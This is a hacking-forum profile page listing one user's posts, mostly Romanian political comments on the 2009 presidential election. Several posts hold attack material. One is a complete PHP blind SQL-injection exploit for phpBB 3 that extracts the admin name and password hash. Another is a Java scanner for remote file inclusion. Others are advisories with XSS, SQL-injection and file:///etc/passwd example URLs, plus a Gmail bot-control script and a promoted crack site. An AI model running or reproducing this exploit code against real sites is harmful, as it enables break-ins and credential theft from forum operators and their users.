Jump to content

hozarares

Active Members
  • Posts

    381
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by hozarares

  1. hozarares

    Official!

    Reformele au inceput demult....iar ca sa dea randament tre` sa punem si noi osu` la munca !!!
  2. Vezi daca te ajuta cu ceva videclipu` asta http://video.google.com/googleplayer.swf?docId=-1162077930592014920&hl=en
  3. E cel mai bun....vulnerabilitatile in Zen Cart apar cel mai rar.
  4. Usually, curl is used to connect and retrieve data from a remote URL using the http protocol. However, curl supports a bunch of protocols. One of these protocols is the file protocol. Using this protocol you can read local files by using an URL like file:///etc/passwd. Therefore, if the user can control the URL passed to curl_exec, in some cases (if the content is echoed back) he can read local files. Vulnerabilitatea afecteaza " /zen-cart/extras/curltest.php " Exemplu : http://site/zen-cart/extras/curltest.php?url=http://192.168.0.1 or http://site/zen-cart/extras/curltest.php?url=http://192.168.1.1. http://site/zen-cart/extras/curltest.php?url=file:///etc/passwd Vulnerabilitatea descoperita de catre Bogdan Calin ( Acunetix )
  5. Ai lovit`o ?
  6. hozarares

    51% – 48%

    Hai sa respectam opiniile tuturor dar cel putin sa aduca argumente.Atata N-W-A...argumente; caci nu o zic cu rautate ci din cunostiinta de cauza. In rest numai de bine.....
  7. hozarares

    51% – 48%

    N-W-A....nu ai destui ani cat sa votezi dar vezi lucruri evidente.....si esti intr`un mediu activ financiar. No Comment !!!
  8. hozarares

    51% – 48%

    Pentru N-W-A si cei care gandesc ca el in privinta alegerilor prezidentiale 2009..... Poate ca nu are "fatza" Basescu de a fi presedinte dar s`a dovedit ca are caracter,este roman,este pentru oameni si vrea sa puna tara pe picioare.Reformele nu au efect peste noapte iar daca nici noi nu punem osu` la treaba atunci ajungem mai rau decat Trinidad Tobago. Enumera`mi si mie ce au facut FSN alias PSD + PNL din `90 incoace si ce a facut PD`L in 5 ani.Multi il blameaza pe presedinte pentru impozitul forfetar; dar nu uita:firmele alea care au cazut erau mai mult de 60%, firme fantoma, iar diferenta de 40% nu produceau nimic ca sa`si plateasca taxele la stat.Iti spun asta ca lucrez in domeniu de 5 ani. Pentru cei care au experienta financiara stiti ca legea asta este foarte buna daca se aplica. De ce crezi ca mai mult de 50% dintre romani voteaza un om si cei sub 50% voteaza o coalitie...duhhhhh.....S`AU SATURAT...M`AM SATURAT...NE`AM SATURAT de comunism si de combinatii politice.Cortina de Fier a cazut de mult dar sunt cativa care cred ca ea mai exista......Doamne cate ar mai fi de spus......
  9. hozarares

    51% – 48%

    http://www.b1tv.ro ########################################################### jtablesession::Store Failed DB function failed with error number 1194 Table 'jos_session' is marked as crashed and should be repaired SQL=INSERT INTO `jos_session` ( `session_id`,`time`,`username`,`gid`,`guest`,`client_id` ) VALUES ( 'iqbtoputt5o4clkiflaaip59s4','1260136047','','0','1','0' ) ########################################################### Cine explica eroarea asta ? ___________________________ Basescu 50,4 Geoana & Co 49,6 ___________________________
  10. hozarares

    51% – 48%

    Mintomar a mai facut erori foarte grave.La alegerile legislative a avut o marja de eroare in favoarea PSD de peste 6%..... In afara faptului ca ciobanu` ranjeste, mai este si C.V. Tudor care din mare Tribun si mare Patriot a venit prin emsiuni cu medaliile oferite dansului de catre tov Iliescu Ion.... Basescu por la patria !!!
  11. Daca iese Geoana atunci revine din nou comunismul democratic la ce folos toti mortii din `89 ? Hai Basescu....macar asta incearca sa faca ceva.Si e timpul sa ne schimbam si noi mentalitatea ," sa pice din cer ".Daca nu punem nici noi osu` la munca, atunci poate sa vina orice presedinte ca tot idioti vom ramane si ne vom merita soarta.
  12. hozarares

    Sal

    Wellcome dude.....
  13. WWW.CRACKS.AM - the oldest and largest source of cracks, patches, keygens and serials - since 1999! cel mai "batran" si inca sigur......
  14. Hopa...scuze....adevaru`i ca nu am verificat nimic din ce am postat azi noapte.Sorry
  15. #!/usr/bin/php -q -d short_open_tag=on <? echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n"; echo "by rgod rgod@autistici.org\n"; echo "site: http://retrogod.altervista.org\n"; echo "dork, version specific: \"Powered by phpBB * 2002, 2009 phpBB Group\"\n\n"; /* works regardless of php.ini settings you need a global moderator account with "simple moderator" role */ if ($argc<5) { echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n"; echo "host: target server (ip/hostname)\n"; echo "path: path to phpbb3\n"; echo "user/pass: u need a valid user account with global moderator rights\n"; echo "Options:\n"; echo " -T[prefix] specify a table prefix different from default (phpbb_)\n"; echo " -p[port]: specify a port other than 80\n"; echo " -P[ip:port]: specify a proxy\n"; echo " -u[number]: specify a user id other than 2 (admin)\n"; echo " -x: disclose table prefix through error messages\n"; echo "Example:\r\n"; echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n"; echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n"; die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\ '; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } $host=$argv[1]; $path=$argv[2]; $user=$argv[3]; $pass=$argv[4]; $port=80; $prefix="PHPBB_"; $user_id="2";//admin $discl=0; $proxy=""; for ($i=3; $i<=$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } if ($temp=="-T") { $prefix=str_replace("-T","",$argv[$i]); } if ($temp=="-u") { $user_id=str_replace("-u","",$argv[$i]); } if ($temp=="-x") { $discl=1; } } if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $data="username=".urlencode($user); $data.="&password=".urlencode($pass); $data.="&redirect=index.php"; $data.="&login=Login"; $packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n"; $packet.="Referer: http://$host$path/ucp.php?mode=login\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); $cookie=""; $temp=explode("Set-Cookie: ",$html); for ($i=1; $i<=count($temp)-1; $i++) { $temp2=explode(" ",$temp[$i]); $cookie.=" ".$temp2[0]; } if (eregi("_u=1;",$cookie)) { //echo $html."\n";//debug //die("Unable to login..."); } echo "cookie -> ".$cookie."\r\n"; if ($discl) { $sql="'suntzuuuuu"; echo "sql -> ".$sql."\n"; $sql=urlencode(strtoupper($sql)); $data="username="; $data.="&icq="; $data.="&email="; $data.="&aim="; $data.="&joined_select=lt"; $data.="&joined="; $data.="&yahoo="; $data.="&active_select=lt"; $data.="&active="; $data.="&msn="; $data.="&count_select=eq"; $data.="&count="; $data.="&jabber="; $data.="&sk=c"; $data.="&sd=a"; $data.="&ip=".$sql; $data.="&search_group_id=0"; $data.="&submit=Search"; $packet="POST ".$p."memberlist.php?joined_select=lt&active_s elec t=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post &field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: ".$cookie." \r\n\r\n"; $packet.=$data; sendpacketii($packet); if (strstr($html,"You have an error in your SQL syntax")) { $temp=explode("posts",$html); $temp2=explode(" ",$temp[0]); $prefix=strtoupper($temp2[count($temp2)-1]); echo "prefix -> ".$prefix."\n";sleep(2); } } $md5s[0]=0;//null $md5s=array_merge($md5s,range(48,57)); //numbers $md5s=array_merge($md5s,range(97,102));//a-f letters //print_r(array_values($md5s)); $j=1;$password=""; while (!strstr($password,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$md5s)) { $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$us er_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; echo "sql -> ".$sql."\n"; $sql=urlencode(strtoupper($sql)); $data="username="; $data.="&icq="; $data.="&email="; $data.="&aim="; $data.="&joined_select=lt"; $data.="&joined="; $data.="&yahoo="; $data.="&active_select=lt"; $data.="&active="; $data.="&msn="; $data.="&count_select=eq"; $data.="&count="; $data.="&jabber="; $data.="&sk=c"; $data.="&sd=a"; $data.="&ip=".$sql; $data.="&search_group_id=0"; $data.="&submit=Search"; $packet="POST ".$p."memberlist.php?joined_select=lt&active_s elec t=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post &field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: ".$cookie." \r\n\r\n"; $packet.=$data; sendpacketii($packet); if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;} } if ($i==255) {die("Exploit failed...");} } $j++; } $j=1;$admin=""; while (!strstr($admin,chr(0))) { for ($i=0; $i<=255; $i++) { $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id ,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; echo "sql -> ".$sql."\n"; $sql=urlencode(strtoupper($sql)); $data="username="; $data.="&icq="; $data.="&email="; $data.="&aim="; $data.="&joined_select=lt"; $data.="&joined="; $data.="&yahoo="; $data.="&active_select=lt"; $data.="&active="; $data.="&msn="; $data.="&count_select=eq"; $data.="&count="; $data.="&jabber="; $data.="&sk=c"; $data.="&sd=a"; $data.="&ip=".$sql; $data.="&search_group_id=0"; $data.="&submit=Search"; $packet="POST ".$p."memberlist.php?joined_select=lt&active_s elec t=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post &field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: ".$cookie." \r\n\r\n"; $packet.=$data; sendpacketii($packet); if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;} } if ($i==255) {die("Exploit failed...");} $j++; } echo "--------------------------------------------------------------------\r\n"; echo "admin -> ".$admin."\r\n"; echo "password (md5) -> ".$password."\r\n"; echo "--------------------------------------------------------------------\r\n"; function is_hash($hash) { if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;} } if (is_hash($password)) {echo "Exploit succeeded...";} else {echo "Exploit failed...";} ?>
  16. ################################################################## ################################################################## # ___ ___ _ _____ __ _ # # / _ \ / _ \| | | __ \ / _| | | # # _ __| | | | | | | |_| | | | ___| |_ __ _ ___ ___ __| | # # | '__| | | | | | | __| | | |/ _ \ _/ _` |/ __/ _ \/ _` | # # | | | |_| | |_| | |_| |__| | __/ || (_| | (_| __/ (_| | # # |_| \___/ \___/ \__|_____/ \___|_| \__,_|\___\___|\__,_| # # # # # # +-+-+-+-+ # # |C|r|e|w| # # +-+-+-+-+ # ################################################################## ################################################################## # [#] Theeta CMS (Cross Site Scripting,SQL Injection) Multiple Vulnerabilities # # [#] Discovered By c0dy # # [#] r00tDefaced | (In)Security Syndicate - Powered by vBulletin # # [#] Greetz: sHoKeD-bYte, syst0x1c & r00tDefaced Members # ################################################################## # # [1]-Cross Site Scripting # # Vulnerability Description: # Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code #injection by malicious web users into the web pages viewed by other users. # # Affected items: # http://127.0.0.1/community/thread.php?start=[XSS] # http://127.0.0.1/community/thread.php?forum=[XSS] # http://127.0.0.1/community/thread.php?cat=[XSS] # http://127.0.0.1/community/forum.php?start=[XSS] # http://127.0.0.1/community/forum.php?cat=[XSS] # http://127.0.0.1/blog/index.php?start=[XSS] # # # Exemple: <script>alert(document.cookie)</script> # # The Risk: # By exploiting this vulnerability, an attacker can inject malicious code in the script and can stole cookies. # # Fix the vulnerability: # * Encode output based on input parameters. # * Filter input parameters for special characters. # * Filter output based on input parameters for special characters... # ################################################################# # # [2]-SQL injection # # Vulnerability Description: # SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an #application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL #statements or user input is not strongly typed and thereby unexpectedly executed. # # Affected items: # http://127.0.0.1/community/forum.php?start=[sql Injection] # http://127.0.0.1/community/thread.php?start=[sql Injection] # http://127.0.0.1/blog/index.php?start=[sql Injection] # # Exemple: -1+ORDER+BY+1-- [You can find the number of colums (Well just incrementing the number until we get an error.)] # # The Risk: # By exploiting this vulnerability, an attacker can inject malicious code in the script and can have acces to the database. # # Fix the vulnerability: # To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead, parameterized statements must be used #(preferred), or user input must be carefully escaped or filtered. # ################################################################# ################################################################# # r00tDefaced [2009-12-01]
  17. #!/usr/bin/env python # GMail Bot Control Framework # hush hush time time # # Modified by RoCracker # import urllib2, ClientForm, os opener = urllib2.build_opener(urllib2.HTTPCookieProcessor()) opener.addheaders = [(\'User-agent\', \'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)\')] urllib2.install_opener(opener) class GMail: def __init__(self, username, password): self.username = username self.password = password def login(self): url = \"http://gmail.com\" page = urllib2.urlopen(url) forms = ClientForm.ParseResponse(page, backwards_compat=False) form = forms[0] form[\"Email\"] = self.username form[\"Passwd\"] = self.password req = form.click() res = urllib2.urlopen(req).read() if \"refresh\" in res: return True return False def retrieve_unread_messages(self): \"\"\" Stops after encountering an entire page of read messages. \"\"\" url = \"http://mail.google.com/mail/?ui=html&zy=e\" page = urllib2.urlopen(url).read() url = page.split(\"url='\")[1].split(\"'\\\"\")[0] base_url = url.replace(\"&\", \"&\") messages = [] start = 0 while True: if not start: url = base_url else: url = base_url + \"&st=%d\" % start page = urllib2.urlopen(url).read() page = page.split(\"<tr bgcolor=\\\"#ffffff\\\">\") if len(page) == 1: break else: page = page[1:] for message in page: message_from = message.split(\"<b>\")[1].split(\"</b>\")[0] message_subject = message.split(\"</font></font>\")[1].split(\"</b>\")[0] message_subject = message_subject.lstrip() message_subject = message_subject.rstrip() if message_subject.startswith(\"<b>\"): message_subject = message_subject.split(\"<b>\")[1] message_url = message.split(\"<a href=\\\"?\")[1].split(\"\\\"\")[0] message_url = \"%s&%s\" % (base_url, message_url) messages.append([message_from, message_subject, message_url]) start += 50 return messages def retrieve_message(self, url): page = urllib2.urlopen(url).read() return page
  18. :::=== RFISCANNER.JAVA ===::: package rrfiscanner; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.net.MalformedURLException; import java.net.Proxy; import java.net.URL; import java.net.URLConnection; public class RfiScanner { private Proxy _conProxy; private boolean _useProxy; private String _SEARCH_WORD; private String _vUrl,_aUrl; /** * @param args */ public RfiScanner(String vUrl,String aUrl) { this._vUrl = vUrl; this._aUrl = aUrl; } public void setUseProxy(boolean use){ this._useProxy = use; } public void setProxy(Proxy proxy){ this._conProxy = proxy; } public void setSearchWord(String word){ this._SEARCH_WORD = word; } public void scan(){ try { PrepareURL victimURL = new PrepareURL(_vUrl,_aUrl); URLConnection uc = null; while(victimURL.hasNext()) { URL u = victimURL.next(); if (_useProxy) { uc = u.openConnection(_conProxy); } else { uc = u.openConnection(); } try{ System.out.println("SCANNING: " + u.toString()); BufferedReader r = new BufferedReader(new InputStreamReader(uc.getInputStream())); String c; while ((c = r.readLine()) != null) { if(c.indexOf(_SEARCH_WORD) != -1) { System.out.println("VULNERABLE URL: " + u.toString()); break;//stop searching } } }catch(IOException ioe){ //well do nothing } } } catch (MalformedURLException mfue) { System.err.println(mfue.toString()); } catch (Exception e) { System.err.println(e.toString()); } } } :::=== PREPAREURL.JAVA ===::: package rrfiscanner; import java.net.MalformedURLException; import java.net.URL; import java.util.ArrayList; import java.util.HashMap; import java.util.Iterator; import java.util.Set; public class PrepareURL { private static final int _nextItemInitialize = -1; private String _victimURL; private String _evilUrl; private ArrayList<URL> _attackUrlList; private int _nextItem; /** * @param victimUrl The URL of the site you want to inject stuff into it's params * @param attackUrl The "stuff" * @throws MalformedURLException Wrong URL */ public PrepareURL(String victimUrl,String attackUrl) throws MalformedURLException { this._victimURL = victimUrl; this._evilUrl = attackUrl; _nextItem = _nextItemInitialize; fillList(); } /** * @return True if there is another element left, false otherwise */ public boolean hasNext() { if(_nextItem == (_attackUrlList.size()-1)) { return false; } return true; } /** * @return Get the next url */ public URL next() { _nextItem++; return _attackUrlList.get(_nextItem); } /** * This resets the class so you can loop again through the URL's */ public void reset() { _nextItem = _nextItemInitialize; } private void fillList() throws MalformedURLException { String query = _victimURL.substring(_victimURL.indexOf("?")+1); _attackUrlList = new ArrayList<URL>(); if(query != null) { HashMap<String,String> paramPairs = getParameters(query); Set<String> paramNames = paramPairs.keySet(); Iterator<String> iParamNames = paramNames.iterator(); String str; while(iParamNames.hasNext()) { str = iParamNames.next(); _attackUrlList.add(new URL(_victimURL.replace(str+"="+paramPairs.get(str), str+"="+_evilUrl))); } } } /** * @param query The query to be stripped down to parameters and it's values * @return A HashMap with paramname:paramvalue */ private HashMap<String,String> getParameters(String query) { HashMap<String,String> paramPairs = new HashMap<String,String>(); String[] rawPairs = query.split("&"); for(int i=0;i<rawPairs.length;i++) { String[] keyValue = rawPairs.split("="); for(int z=0;z<keyValue.length;z+=2) { paramPairs.put(keyValue[z], keyValue[z+1]); } } return paramPairs; } }
  19. Pai il discutam draga N-W-A.... Il sustin pe Basescu cu votul meu !!! Daca nu facem politica si/sau polemica pe tema politicii romanesti e ca si cum ai fi un peste cu carligu` in bot si sa te plimbe altu.... Oricum, cui nu`i place topicu` politic pe care il postez si pe care le voi posta il rog frumos sa nu citeasca si/sau sa dea un raspuns . Va multumesc anticipat pentru intelegere !!!
  20. Trebuia sa`l verifici inainte sa`l postezi, nu sa te iei dupa ce zice unu` si altu`. Chestia care ai pus`o este un fake ordinar.Eu am 2 versiuni full.Niici chiar aia de la nosec.org nu au serverele chiar asa de sigure.......
  21. Eu am preluat de pe B1Tv dar munca apartine celor de la cotidianul Curentul. Curentul - Prima pagin?
  22. Mah....du`te si fa`ti un control la cap......chestiile astea DOS nu merg de pe programe " facute noaptea " si vandute pe deasupra cu 20 Euro.....Pleaca mah ca`i iei vopseaua,pleaca de`aici.....
  23. Nicolae Popa, cel care a semnat si a scos pentru Sorin Ovidiu Vantu TOTI banii de la FNI a fost arestat de catre INTERPOL in capitala Indonesiei,Jakarta. Ce legatura este intre Mircea Geoana si Nicolae Popa ? E simplu, in anul 2004 Nicolae Popa a cerut la ambasada Romaniei din Indonesia o prelungire de pasaport; dar ca fiind sub urmarire internationala nu a putut avea acel pasaport prelungit fara ajutorul lui Mircea Geoana, care atentie, a fost MINISTRUL DE EXTERNE al Romaniei in anul 2004.( imi cer scuze daca ma repet ) Ieri la miezu` noptii,Mircea Geoana face o vizita acasa la Sorin Ovidiu Vantu si este fotografiat de catre reporterii de la Academia Catavencu. In confruntarea din aceasta seara , presedintele Traian Basescu il intreaba pe Mircea Geoana daca a fost la S.O. Vantu ieri noapte si daca il stie pe, atentie din nou, "dl. Popa".La inceput neaga orice fel de relatie cu S.O.Vantu, pe urma recunoaste.Mircea Geoana a jurat pe BIBLIE ca nu`l stie pe "Nicolae Popa" ( prostie sau gafa din partea lui Geoany ?) Acestia sunt cei de la PSD....votati comunisti mincinosi ,lasi ,criminali si nenorociti !!! Unde esti tu Tepes, Doamne ? P.S. : Daca cade Nicolae Popa cade si S.O.Vantu, Geoana , Patriciu....etc.... Doamne Ajuta !!!
  24. Pentru cei care au probleme cu PC`ul in "recuperarea" parolei va sugerez acest mic program. Click AICI pentru descarcare
  25. Ce versiune zici ca este ? Da eroare la descarcat.Pune`l pe Megaupload.com
×
×
  • Create New...